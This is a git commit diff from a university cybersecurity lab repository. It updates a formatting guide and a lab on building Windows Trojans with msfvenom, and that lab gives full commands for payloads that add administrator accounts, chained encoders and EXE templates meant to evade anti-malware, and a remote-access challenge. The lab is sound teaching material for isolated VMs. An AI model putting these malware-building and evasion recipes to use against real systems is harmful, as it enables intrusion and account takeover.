cybersecurity/HacktivityLabSheets
1
0
Fork 0
mirror of https://github.com/cliffe/HacktivityLabSheets.git synced 2026-02-21 11:18:09 +00:00
Code Issues Packages Projects Releases Wiki Activity

Enhance author display logic and improve command formatting guidelines across lab sheets

Browse Source 
- Updated author display in lab metadata to handle multiple authors correctly.
- Added detailed command formatting instructions in the example highlighting guide, emphasizing the use of markdown code blocks and escaping pipe characters.
- Improved consistency in lab instructions by standardizing headings and formatting for clarity.
- Introduced a new lab on software vulnerabilities, exploits, and remote access payloads, providing a comprehensive overview of the topic.
This commit is contained in:
Z. Cliffe Schreuders
2025-09-25 12:34:07 +01:00
parent 73bc16b001
commit 31155f9aeb
8 changed files with 864 additions and 148 deletions
Download Patch File Download Diff File Expand all files Collapse all files

59
_labs/example_highlighting_guide.md
View File

@@ -26,6 +26,21 @@ The highlighting system supports two main types of highlighting:
### Basic Format
Use `==type: content==` where `type` is one of: `action`, `tip`, `hint`, `warning`, `VM`
### Command Formatting
All bash/terminal commands should be properly formatted with markdown code blocks:
**Before:**
```
msfvenom -l payload | less
```
**After:**
```bash
msfvenom -l payload | less
```
**Important**: Always use `bash` language tag for terminal commands and escape pipe characters (`|` becomes `\|`) within code blocks.
### Examples
**Action Highlights:**
@@ -98,8 +113,31 @@ Use `> Type: content` where `Type` is one of: `Action`, `Tip`, `Warning`, `Hint`
> Note: This command lists all processes running on the system. The "aux" flags provide detailed information about each process.
**Important**: Since the "Note:", "Tip:", and "Hint:" labels are not visible in the rendered output, always capitalize the first word after the colon to make the content clear and readable.
## 🤖 AI Instructions for Lab Sheet Editing
### Step 0: Format Commands Properly
Before applying highlighting, ensure all bash/terminal commands are properly formatted:
**Command Formatting Rules:**
- All terminal commands must be in markdown code blocks with `bash` language tag
- Escape pipe characters: `|` becomes `\|` within code blocks
- Commands should be on their own lines, not inline with text
**Examples:**
```markdown
# Before (incorrect):
Run the command msfvenom -l payload | less
# After (correct):
==action: Run the command:==
```bash
msfvenom -l payload \| less
```
```
### Step 1: Identify Action Items
Look for sentences that describe actions students need to perform:
- Commands to run
@@ -156,6 +194,8 @@ Look for:
**Convert to:** `> Note: [troubleshooting or explanation content]` for block-level notes
**Important**: Always capitalize the first word after "Note:", "Tip:", or "Hint:" since these labels are not visible in the rendered output.
## 📋 Conversion Examples
@@ -246,6 +286,21 @@ From the command line ==action: run:==
whoami
```
```
### Before (Plain Text):
```
Run the command msfvenom -l payload | less to see available payloads.
```
### After (Highlighted):
```
==action: Run the command:==
```bash
msfvenom -l payload \| less
```
to see available payloads.
```
### Before (Plain Text):
```
Note, this is lowercase “LS”.
@@ -345,6 +400,8 @@ Before applying highlighting to any lab sheet:
- [ ] **Check TOC completeness** - ensure all major sections are listed
- [ ] **Verify heading hierarchy** - confirm proper use of #, ##, ###, etc.
- [ ] **Test all existing links** - both internal TOC links and external URLs
- [ ] **Format all commands** - ensure all bash/terminal commands use proper markdown code blocks with `bash` language tag
- [ ] **Escape pipe characters** - convert `|` to `\|` in all command code blocks
- [ ] **Identify content types** - map out where actions, tips, hints, warnings, VM context, and troubleshooting/explanations appear
- [ ] **Identify troubleshooting text** - find text that provides troubleshooting information after commands and format as note blocks
- [ ] **Plan highlighting strategy** - decide which content truly needs highlighting
@@ -390,6 +447,8 @@ ls -la
5. **Ignoring warnings**: Ensure all safety warnings and important cautions are highlighted
6. **Poor tip placement**: Tips should be genuinely helpful, not obvious information
7. **Missing troubleshooting formatting**: Don't forget to format troubleshooting text after commands as note blocks
8. **Improper command formatting**: Always use `bash` code blocks for terminal commands and escape pipe characters
9. **Uncapitalized block content**: Always capitalize the first word after "Note:", "Tip:", or "Hint:" since these labels are not visible in the rendered output
### File Structure Requirements

2
_labs/introducing_attacks/1_intro_linux.md
View File

@@ -405,7 +405,7 @@ To ==action: check the fingerprint, on the desktop run==:
ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub
```
> hint: Hint: you may also need to check other .pub files in that directory
> Hint: you may also need to check other .pub files in that directory
If the fingerprint presented to you while connecting matches, type “yes”, and from then on if you connect to the same machine you won't be prompted.

285
_labs/introducing_attacks/2_malware_msf_payloads.md
View File

@@ -31,76 +31,31 @@ cybok:
keywords: ["PENETRATION TESTING - SOFTWARE TOOLS", "PENETRATION TESTING - ACTIVE PENETRATION"]
---
# Malware and an Introduction to Metasploit and Payloads
### License {#preparation}
![][image1]
This work by [Z. Cliffe Schreuders](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License](https://creativecommons.org/licenses/by-sa/4.0/deed.en_GB).
### Contents {#preparation}
[License](#preparation)
[Contents](#preparation)
[General notes about the labs](#general-notes-about-the-labs)
[Preparation](#preparation)
[Introduction to malware](#introduction-to-malware)
[Types of malware](#types-of-malware)
[Introduction to the Metasploit framework (MSF) and payloads](#introduction-to-the-metasploit-framework-\(msf\)-and-payloads)
[Using MSF to create Trojan executables](#using-msf-to-create-trojan-executables)
[Anti-malware](#anti-malware)
[Evading anti-malware using encoding and EXE templates](#evading-anti-malware-using-encoding-and-exe-templates)
[Creating a shell script Trojan horse](#heading=h.6okkmt33mi8n)
[A note about remote access Trojan horses](#a-note-about-remote-access-trojan-horses)
[Going the extra mile](#going-the-extra-mile)
[More payloads](#heading=h.47ked5ek2ma4)
[Stealing secrets from the victim](#stealing-secrets-from-the-victim)
[EXE wrappers](#exe-wrappers)
[Conclusion](#conclusion)
### General notes about the labs {#general-notes-about-the-labs}
## General notes about the labs {#general-notes-about-the-labs}
Often the lab instructions are intentionally open ended, and you will have to figure some things out for yourselves. This module is designed to be challenging, as well as fun\!
However, we aim to provide a well planned and fluent experience. If you notice any mistakes in the lab instructions or you feel some important information is missing, please let me (Cliffe) know and I will try to address any issues.
### Preparation {#preparation}
## Preparation {#preparation}
For all of the labs in this module, start by logging into Hacktivity.
==action: For all of the labs in this module, start by logging into Hacktivity==.
[**Click here for a guide to using Hacktivity.**](https://docs.google.com/document/d/17d5nUx2OtnvkgBcCQcNZhZ8TJBO94GMKF4CHBy1VPjg/edit?usp=sharing) This includes some important information about how to use the lab environment and how to troubleshoot during lab exercises. If you havent already, have a read through.
[**Click here for a guide to using Hacktivity.**](https://docs.google.com/document/d/17d5nUx2OtnvkgBcCQcNZhZ8TJBO94GMKF4CHBy1VPjg/edit?usp=sharing) This includes some important information about how to use the lab environment and how to troubleshoot during lab exercises. If you haven't already, have a read through.
Make sure you are signed up to the module, claim a set of VMs for this lab, and start your VMs.
==action: Make sure you are signed up to the module, claim a set of VMs for this lab, and start your VMs==.
Interact with the Kali VM. (Click ![][image2] after the VMs have started). Login with username kali, password kali.
==VM: Interact with the Kali VM==. (Click ![][image2] after the VMs have started). ==action: Login with username "kali", password "kali"==.
Interact with the Windows Victim VM. Login with password tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember) and a user account **other than vagrant** (vagrant is a system account used for VM deployment).
==VM: Interact with the Windows Victim VM==. ==action: Login with password "tiaspbiqe2r"== (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember) and a user account **other than vagrant** (vagrant is a system account used for VM deployment).
**A note about Operating Systems**
Although malware exists for all types of operating system, Windows is targeted most often, as it is the most popular desktop OS. However, each new version of Windows introduces updated security measures that, among other things, have increased capabilities for detecting malicious software, and adding some additional steps or complications for attackers and exploitation. That is why, for now, we will be attacking victims who are using Windows 7, as this versions security mitigations can be easily understood. The other OS we will be working with is a recent release of Kali Linux, which is pre-loaded with hundreds of applications for things such as pen-testing, ethical hacking, and network monitoring.
### Introduction to malware {#introduction-to-malware}
“If a bad guy can persuade you to run his program on your computer, it's not your computer anymore”
## Introduction to malware {#introduction-to-malware}
> “If a bad guy can persuade you to run his program on your computer, it's not your computer anymore”
Microsoft, “TechNet Essay: 10 Immutable Laws of Security”
The above quote from a Microsoft technical essay illustrates a long held assumption in computer security: a program running on your computer can cause security problems.
@@ -111,7 +66,7 @@ Depending on the access control systems in place, which restrict what each user
Obviously, an attacker just needs to find some way to get the malware onto a victims computer.
### Types of malware {#types-of-malware}
## Types of malware {#types-of-malware}
There are many different ways that malware can be categorised. Some of the main categories include:
@@ -137,119 +92,141 @@ There are many different ways that malware can be categorised. Some of the main
* Ransomware: malware that typically encrypts files on a victim's system and demands payment (often in cryptocurrency) for the decryption key.
### Introduction to the Metasploit framework (MSF) and payloads {#introduction-to-the-metasploit-framework-(msf)-and-payloads}
## Introduction to the Metasploit framework (MSF) and payloads {#introduction-to-the-metasploit-framework-msf-and-payloads}
The Metasploit framework (MSF) is one of the most powerful tools in an ethical hackers software collection. MSF contains an extensive library of exploits (that is, software that takes advantage of vulnerable systems) and a framework for developing exploits, as well as numerous other security features, such as tools for information gathering. The framework itself is free and open source software (FOSS), and the company that maintains it also releases a commercial closed source graphical front end, of which there is the “free” (as in no-cost) Community edition, and the paid-for Metasploit Pro. In most cases the framework provides everything we need, and using the non-graphical interfaces will teach you more about the concepts and the framework itself.
Since the aim of many different types of attacks is to run malicious code on a system, it is no surprise that Metasploit can be used to generate malware.
### Using MSF to create Trojan executables {#using-msf-to-create-trojan-executables}
## Using MSF to create Trojan executables {#using-msf-to-create-trojan-executables}
**On the Kali Linux VM (the attacker)**, open a terminal by clicking the console icon.
==VM: On the Kali Linux VM (the attacker)==, ==action: open a terminal by clicking the console icon==.
Type msf (dont press Enter) and press the Tab key twice. This will list some of the programs that are a part of Metasploit. The command we are interested in now is **msfvenom**, a payload generator.
==action: Type "msf" (don't press Enter) and press the Tab key twice==. This will list some of the programs that are a part of Metasploit. The command we are interested in now is **msfvenom**, a payload generator.
A *payload* refers to the malicious code that we want to run on a victims system. Metasploit comes with a huge collection of different kinds of payloads that it can generate.
A *payload* refers to the malicious code that we want to run on a victim's system. Metasploit comes with a huge collection of different kinds of payloads that it can generate.
To view a list of all the payloads available, run:
==action: To view a list of all the payloads available, run:==
msfvenom \-l payload | less
```bash
msfvenom -l payload | less
```
It may take a minute for msfpayload to start, and for the list to be visible.
Note, we are piping the output through to less, so that we can easily scroll through the output.
> Note: We are piping the output through to less, so that we can easily scroll through the output.
Wow. Thats a lot of possibilities\!
Wow. That's a lot of possibilities\!
Browse through the list.
==action: Browse through the list==.
To keep our first example simple, lets start by creating a Trojan horse that simply adds a new user to a victims Windows system. Looking at the list above, we can see that the payload windows/adduser looks like it does what we want.
To keep our first example simple, let's start by creating a Trojan horse that simply adds a new user to a victim's Windows system. Looking at the list above, we can see that the payload "windows/adduser" looks like it does what we want.
Press “q” to exit less.
==action: Press "q" to exit less==.
To find the options for this payload run:
==action: To find the options for this payload run:==
msfvenom \-p windows/adduser \--list-options
```bash
msfvenom -p windows/adduser --list-options
```
Note that the --list-options above instructs msfvenom to show us the options that are available for us to configure.
> Note: That the "--list-options" above instructs msfvenom to show us the options that are available for us to configure.
The output tells us that there are a number of configuration options, along with their default values. Based on this information we can configure a payload and check our settings are ok with the following command:
msfvenom \-p windows/adduser USER=leeds PASS=1234
```bash
msfvenom -p windows/adduser USER=leeds PASS=1234
```
The above command will check the password for complexity requirements, and confirm the settings will be applied correctly. Since your selected password is too simple you will get an error message, so simply repeat with a better password:
msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377
```bash
msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377
```
Tip: press the up arrow on the keyboard, rather than typing the whole line again.
> Tip: Press the up arrow on the keyboard, rather than typing the whole line again.
The output from this command is a raw representation of the machine code that if executed will result in our payload: a new user will be added to the system.
To view a list of all the output formats available, run:
==action: To view a list of all the output formats available, run:==
msfvenom \-l format
```bash
msfvenom -l format
```
To generate a C code version, simply append -f C. Run:
==action: To generate a C code version, simply append "-f C". Run:==
msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377 \-f C
```bash
msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377 -f C
```
Since we are creating a Trojan horse, the next step is to create an executable program that will actually run this code. To do this we specify exe as our output type, and send the result to a new file.
Since we are creating a Trojan horse, the next step is to create an executable program that will actually run this code. To do this we specify "exe" as our output type, and send the result to a new file.
msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377 \-f exe \> myGame.exe
```bash
msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377 -f exe > myGame.exe
```
This has generated a windows executable in our current directory. Confirm this by running ls.
This has generated a windows executable in our current directory. ==action: Confirm this by running "ls"==.
Next, we get a Windows user to run our Trojan.
Start a Web server to share your Trojan:
==action: Start a Web server to share your Trojan:==
Start by creating a directory to place our files:
==action: Start by creating a directory to place our files:==
```bash
sudo mkdir /var/www/html/share
```
Copy your new Trojan to this location:
==action: Copy your new Trojan to this location:==
```bash
sudo cp myGame.exe /var/www/html/share/
```
Start the Apache Web server:
==action: Start the Apache Web server:==
```bash
sudo service apache2 start
```
You should see the status active (running).
You should see the status 'active (running)'.
Before proceeding, note the IP address of the Kali Linux VM.
==action: Before proceeding, note the IP address of the Kali Linux VM==.
*Remember, you can find this by running ip a”.*
> Note: Remember, you can find this by running "ip a".
**On the Windows VM (the victim)**, browse to the Web server hosting the Trojan horse.
==VM: On the Windows VM (the victim)==, ==action: browse to the Web server hosting the Trojan horse==.
Open a Web browser, and in the location bar, enter the IP address of your Kali Linux system followed by /share/name-of-file.
==action: Open a Web browser, and in the location bar, enter the IP address of your Kali Linux system followed by "/share/name-of-file"==.
For example: *172.16.29.130*/share/myGame.exe (with the Kali IP address.)
For example: "*172.16.29.130*/share/myGame.exe" (with the Kali IP address.)
*If you see a message that your request is blocked by a firewall or a proxy policy, double-check proxy settings in your web browser on Windows7. You might need to add the IP address into the list of exceptions (click on Advanced button next to ip-address of a proxy server).*
> Note: If you see a message that your request is blocked by a firewall or a proxy policy, double-check proxy settings in your web browser on Windows7. You might need to add the IP address into the list of exceptions (click on "Advanced" button next to ip-address of a proxy server).
*![][image3]*
Download the Trojan horse (click on the link).
==action: Download the Trojan horse (click on the link)==.
*If you are using Chrome and get a message saying this file is dangerous and Chrome has blocked it, go to your downloads (Ctrl \+ J) and click on Keep dangerous file. Confirm you really want to keep it.*
> Note: If you are using Chrome and get a message saying this file is dangerous and Chrome has blocked it, go to your downloads (Ctrl \+ J) and click on "Keep dangerous file". Confirm you really want to keep it.
![][image4]
Run the Trojan horse you just downloaded in the Windows VM (find the file you just downloaded and run it). For example, open the Downloads tool in the web browser and double click.
==action: Run the Trojan horse you just downloaded in the Windows VM== (find the file you just downloaded and run it). For example, open the Downloads tool in the web browser and double click.
It didnt look like much happened...
It didn't look like much happened...
Open a command prompt (on your keyboard press WindowsKey+R, then run cmd”).
==action: Open a command prompt (on your keyboard press WindowsKey+R, then run "cmd")==.
View a list of the users on the system by running:
==action: View a list of the users on the system by running:==
```bash
net user
```
You should find that your Trojan horse has done its deed, and a new Administrator user exists on the Windows system, with a name of leeds (as this was set with the USER= part of the payload). To double check their existence, log out of Windows and you will see the newly-added user on the login screen.
You should find that your Trojan horse has done its deed, and a new Administrator user exists on the Windows system, with a name of 'leeds' (as this was set with the USER= part of the payload). To double check their existence, log out of Windows and you will see the newly-added user on the login screen.
### Anti-malware {#anti-malware}
## Anti-malware {#anti-malware}
The traditional approach to mitigate the threat posed by malware is based on avoidance and detection. So, for instance, the general advice is “dont run any programs that you dont trust”. One way to enforce that is to have a whitelist of all the programs that are allowed to run, or a blacklist of all the programs that are not allowed to run.
@@ -257,7 +234,7 @@ Traditional anti-malware software is based on a blacklist approach, where a list
The following list shows some of the advantages and disadvantages of each approach:
### Signature-Based malware detection:
## Signature-Based malware detection:
Advantages:
@@ -272,7 +249,7 @@ Disadvantages:
* Signature Updates Required: Regular updates are necessary to keep the signature database current. Delay in updates can leave systems vulnerable to new threats (this is part of why OS security updates are so important).
* Polymorphic Malware Evasion: Polymorphic malware, which can change its appearance while maintaining the same functionality, can evade detection by signature-based systems.
### Anomaly-Based malware detection:
## Anomaly-Based malware detection:
Advantages:
@@ -288,37 +265,43 @@ Disadvantages:
* Resource Intensive: Continuous monitoring and analysis of system behavior can be resource-intensive, potentially affecting system performance.
* Baseline Establishment Challenges: Defining a baseline of normal behavior can be challenging, and anomalies may vary between different environments.
Lets test your new Trojan horse against existing anti-malware software.
==action: Let's test your new Trojan horse against existing anti-malware software==.
ClamAV is an open-source engine for detecting malicious software on a variety of operating systems. It includes a flexible and scalable multi-threaded daemon, a command-line scanner and an advanced tool for automatic database updates.
**On the Kali Linux VM (the attacker)**, start by navigating outside of your home directory (the place where the myGame.exe malware is). You can do this with the following command:
==VM: On the Kali Linux VM (the attacker)==, ==action: start by navigating outside of your home directory (the place where the myGame.exe malware is)==. You can do this with the following command:
```bash
cd Documents
```
You can now scan this folders for malware by typing the following command to initiate ClamAV:
==action: You can now scan this folders for malware by typing the following command to initiate ClamAV:==
```bash
clamscan
```
Looking at the output, you should see that one directory has been scanned and the number of infected files is zero (assuming you didnt save any previously-created malware in this folder. If you did, navigate to another folder and repeat). Typing cd will return you to your /home folder. Now run clamscan again.
Looking at the output, you should see that one directory has been scanned and the number of infected files is zero (assuming you didn't save any previously-created malware in this folder. If you did, navigate to another folder and repeat). ==action: Typing 'cd' will return you to your /home folder. Now run 'clamscan' again==.
This time, you should see a couple of differences \- first, the number of infected files should be 1\. Second, looking at the list of files scanned should show myGame.exe, listed as a Windows Trojan and with a status of FOUND. As this malware was created using a simple method, nothing was done to hide its malicious code, meaning it will be detected by a large number of anti-malware programs.
Also the fact that the program didnt seem to do anything might raise suspicions, if you were to send it to someone. Let's see if we can improve the attack...
Also the fact that the program didn't seem to do anything might raise suspicions, if you were to send it to someone. Let's see if we can improve the attack...
**On the Kali Linux VM (the attacker)**:
==VM: On the Kali Linux VM (the attacker)==:
Note that signature-based anti-malware, at its simplest, may simply look for an exact copy of a previously recorded malware.
One way to check if a file matches another is using one-way hash functions. Run:
==action: One way to check if a file matches another is using one-way hash functions. Run:==
```bash
sha256sum myGame.exe
```
The output is a hash that represents the exact contents of myGame.exe, any slight change to the file will result in a completely different hash.
Think about how this relates to the challenges facing signature-based anti-malware products.
### Evading anti-malware using encoding and EXE templates {#evading-anti-malware-using-encoding-and-exe-templates}
## Evading anti-malware using encoding and EXE templates {#evading-anti-malware-using-encoding-and-exe-templates}
Note that there are lots of different ways of encoding the same computer instructions, and clever tricks can be used to obfuscate code. Therefore, we can re-encode our payload so that the file is different, yet results in exactly the same behaviour. This approach can be used to fool many forms of signature-based anti-malware.
@@ -326,27 +309,33 @@ Note that there are lots of different ways of encoding the same computer instruc
The msfvenom command can be used to re-encode payloads.
List the encode options available:
==action: List the encode options available:==
msfvenom \-l encoders
```bash
msfvenom -l encoders
```
To re-encode the payload, run:
==action: To re-encode the payload, run:==
msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377 \-e x86/shikata\_ga\_nai \-i 7 \-f exe \> myGame2.exe
```bash
msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377 -e x86/shikata_ga_nai -i 7 -f exe > myGame2.exe
```
*The e-flag specifies the encoder to use, the \-i flag indicates the number of times to encode (in this case, 7), and the f-flag sets the desired output format.*
> Note: The e-flag specifies the encoder to use, the \-i flag indicates the number of times to encode (in this case, 7), and the f-flag sets the desired output format.
Again, you can use different options if you wish, you can check options using the --list-options flag.
Again, you can use different options if you wish, you can check options using the "--list-options" flag.
Generate a hash of this re-encoded version of our Trojan:
==action: Generate a hash of this re-encoded version of our Trojan:==
```bash
sha256sum myGame2.exe
```
Note, that the hash is different, meaning the two files do not match. Yet they achieve the exact same thing.
Now run clamscan again to see if the re-encoding allows it to slip by this malware detection. You may notice that the file is still listed as FOUND and the number of infected files is greater than zero. This means that ClamAV is still detecting the malware, despite our effort to disguise it.
==action: Now run "clamscan" again to see if the re-encoding allows it to slip by this malware detection==. You may notice that the file is still listed as FOUND and the number of infected files is greater than zero. This means that ClamAV is still detecting the malware, despite our effort to disguise it.
Try creating the payload again, but change the value after the -i flag to increase the number of times its encoded. Does this allow it to slip past ClamAV?
==action: Try creating the payload again, but change the value after the '-i' flag to increase the number of times it's encoded==. Does this allow it to slip past ClamAV?
As you can see, modern anti-malware is doing more than checking the exact contents of the file, and many will still detect this version. However, note that we are in well tested waters, and if you were to write your own malicious program from scratch, most anti-malware products would ***not*** detect it.
@@ -356,69 +345,79 @@ Embedding the payload into an existing program will seem less suspicious to anti
However, using this approach, when the victim runs our Trojan, the harmless program can also run. A related technique is using an “EXE wrapper”, which can combine multiple programs together, and can be used to combine existing Trojans executables with other programs, and both programs are launched when the combined program is started. This gives the impression that the program is behaving as expected.
Start by obtaining a small Windows program to embed our payload into. If you like, you could get a copy of notepad or solitaire from the Windows VM, and copy it to the Kali Linux VM.Alternatively, download Notepad++ from the Internet and transfer it onto the Kali VM by doing the following:
==action: Start by obtaining a small Windows program to embed our payload into==. If you like, you could get a copy of notepad or solitaire from the Windows VM, and copy it to the Kali Linux VM.Alternatively, download Notepad++ from the Internet and transfer it onto the Kali VM by doing the following:
First, open a browser on your local machine (not one of the VMs) and navigate to the following address, saving the file once prompted:
==action: First, open a browser on your local machine (not one of the VMs) and navigate to the following address, saving the file once prompted:==
https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.1.5/npp.8.1.5.portable.zip
Navigate to the folder it downloaded to, then drag and drop it onto the desktop of the Kali VM. It should copy over, and you should now have it on the Kali system.
==action: Navigate to the folder it downloaded to, then drag and drop it onto the desktop of the Kali VM==. It should copy over, and you should now have it on the Kali system.
Unzip the file.
==action: Unzip the file==.
unzip npp.8.1.5.portable.zip
```bash
unzip npp.8.1.5.portable.zip
```
Lets use msfvenom to embed the payload in our program. Try out the following (if the file is not found, change the path from /root/notepad++.exe to that of the file you just unzipped):
==action: Let's use msfvenom to embed the payload in our program. Try out the following== (if the file is not found, change the path from /root/notepad++.exe to that of the file you just unzipped):
msfvenom \-p windows/messagebox TEXT="You should not have clicked that\!" \--platform windows \-x /root/notepad++.exe PrependMigrate=true \-k \-f exe \> myNotepad++.exe
```bash
msfvenom -p windows/messagebox TEXT="You should not have clicked that!" --platform windows -x /root/notepad++.exe PrependMigrate=true -k -f exe > myNotepad++.exe
```
msfvenom \-p windows/exec CMD='cmd.exe /c "net user /add leeds2 L33d583ck377 && localgroup administrators leeds3 /add & START /B notepad.exe"' \--platform windows \-x /root/notepad++.exe \-f exe \> myNotepad2++.exe
```bash
msfvenom -p windows/exec CMD='cmd.exe /c "net user /add leeds2 L33d583ck377 && localgroup administrators leeds3 /add & START /B notepad.exe"' --platform windows -x /root/notepad++.exe -f exe > myNotepad2++.exe
```
Now that we have our program to use as a template, we want to try to avoid detection, so lets do more to encode our payload. Run (on one line):
Now that we have our program to use as a template, we want to try to avoid detection, so let's do more to encode our payload. ==action: Run (on one line):==
msfvenom \-p windows/exec CMD='cmd.exe /c "net user /add leeds4 L33d583ck377 && localgroup administrators leeds4 /add & START /B notepad.exe"' \-e x86/shikata\_ga\_nai \-i 3 \-a x86 \--platform windows | msfvenom \-e x86/countdown \-i 9 \-a x86 \--platform windows | msfvenom \-e x86/shikata\_ga\_nai \-i 1 \-a x86 \--platform windows | msfvenom \-x /root/notepad++.exe \-f exe \-a x86 \--platform windows \-e x86/call4\_dword\_xor \-i 10 \> myNotepad3++.exe
```bash
msfvenom -p windows/exec CMD='cmd.exe /c "net user /add leeds4 L33d583ck377 && localgroup administrators leeds4 /add & START /B notepad.exe"' -e x86/shikata_ga_nai -i 3 -a x86 --platform windows | msfvenom -e x86/countdown -i 9 -a x86 --platform windows | msfvenom -e x86/shikata_ga_nai -i 1 -a x86 --platform windows | msfvenom -x /root/notepad++.exe -f exe -a x86 --platform windows -e x86/call4_dword_xor -i 10 > myNotepad3++.exe
```
If you try your own combination of commands, rather than copying this example exactly, you will be more likely to evade detection.
> Tip: If you try your own combination of commands, rather than copying this example exactly, you will be more likely to evade detection.
Once again, share the new Trojan horses, by copying them to the Web servers directory:
==action: Once again, share the new Trojan horses, by copying them to the Web server's directory:==
```bash
sudo cp myNotepad++.exe myNotepad2++.exe myNotepad3++.exe /var/www/html/share/
```
**On the Windows VM (the victim)**, again browse to the Apache Web server running on the Kali VM, enter the URLs for the new executables, and download and run them.
==VM: On the Windows VM (the victim)==, ==action: again browse to the Apache Web server running on the Kali VM, enter the URLs for the new executables, and download and run them==.
The first (myNotepad) should open a window with the message You should not have clicked that\! (this was set when we created the malware). The second and third programs should open Notepad, as if they were normal software. However, in the background, they have performed the same task as the malware we created earlier.
The first (myNotepad) should open a window with the message "You should not have clicked that\!" (this was set when we created the malware). The second and third programs should open Notepad, as if they were normal software. However, in the background, they have performed the same task as the malware we created earlier.
Confirm that the attack was successful (using net user from the command line), and that two new user accounts were added to the system: leeds3 and leeds4.
==action: Confirm that the attack was successful (using "net user" from the command line), and that two new user accounts were added to the system: leeds3 and leeds4==.
**On the Kali Linux VM (the attacker)**:
==VM: On the Kali Linux VM (the attacker)==:
So how does our new Trojan horse fare against anti-malware products?
Navigate to the folder /var/www/html/share and run clamscan again. You should see that the myNotepad files we just created are not detected as malware. Result\!
==action: Navigate to the folder /var/www/html/share and run "clamscan" again==. You should see that the myNotepad files we just created are not detected as malware. Result!
For reference, the version created using the last example above was not detected by any of the many anti-malware products that VirusTotal.com checks against at the time of creation. However, as time goes on, the signature databases are updated, and the act of uploading files gives them samples to analyse. Try using other programs as templates and using different encoding settings to see which methods hide your Trojan horse from detection.
For reference, the version created using the last example above was not detected by any of the many anti-malware products that VirusTotal.com checks against at the time of creation. However, as time goes on, the signature databases are updated, and the act of uploading files gives them samples to analyse. ==tip: Try using other programs as templates and using different encoding settings to see which methods hide your Trojan horse from detection==.
### A note about remote access Trojan horses {#a-note-about-remote-access-trojan-horses}
## A note about remote access Trojan horses {#a-note-about-remote-access-trojan-horses}
Many Trojans have a client-server architecture, which allows the attacker to connect to an infected system and issue commands. Typically the attacker uses some trickery to get a user to run the server program, which waits listening for connections. The attacker then uses the Trojans client program to connect and send commands to the victims system.
In later labs we will cover other payloads that give you remote access to the victim system, which would enable you to create a remote access trojan (RAT) using the method you have used above. Later you may wish to repeat this lab, creating a Trojan that presents the attacker with a remote shell (command prompt).
### Going the extra mile {#going-the-extra-mile}
## Going the extra mile {#going-the-extra-mile}
Want to be a guru? Just want more hacking and other fun stuff to do? Then **you should attempt these extra challenges** included in the labs. Even if you dont, you should read through the following description.
#### Stealing secrets from the victim {#stealing-secrets-from-the-victim}
### Stealing secrets from the victim {#stealing-secrets-from-the-victim}
As you have seen, Metasploit includes many more payloads than the “windows/adduser” or “windows/exec” payloads you used above. Feel free to experiment with other payloads.
Use a msf payload Trojan to enable your Kali Linux system to remotely access the Windows Victim, and retrieve the my\_secret file from the desktop\! What secret is the Victim hiding?
==action: Use a msf payload Trojan to enable your Kali Linux system to remotely access the Windows Victim, and retrieve the my\_secret file from the desktop\!== What secret is the Victim hiding?
#### EXE wrappers {#exe-wrappers}
### EXE wrappers {#exe-wrappers}
Experiment with EXE wrappers, to create a Trojan based on a Metasploit payload that seems to behave like a functioning game/application. You can attach your malware to an existing program, of your choice so that, when it is started, they both run. This will seem less suspicious to a user, since the program will appear innocent, rather than appearing to do nothing.
==action: Experiment with EXE wrappers, to create a Trojan based on a Metasploit payload that seems to behave like a functioning game/application==. You can attach your malware to an existing program, of your choice so that, when it is started, they both run. This will seem less suspicious to a user, since the program will appear innocent, rather than appearing to do nothing.
### Conclusion {#conclusion}
## Conclusion {#conclusion}
At this point you have:

641
_labs/introducing_attacks/3_vulnerabilities.md Normal file
View File

File diff suppressed because one or more lines are too long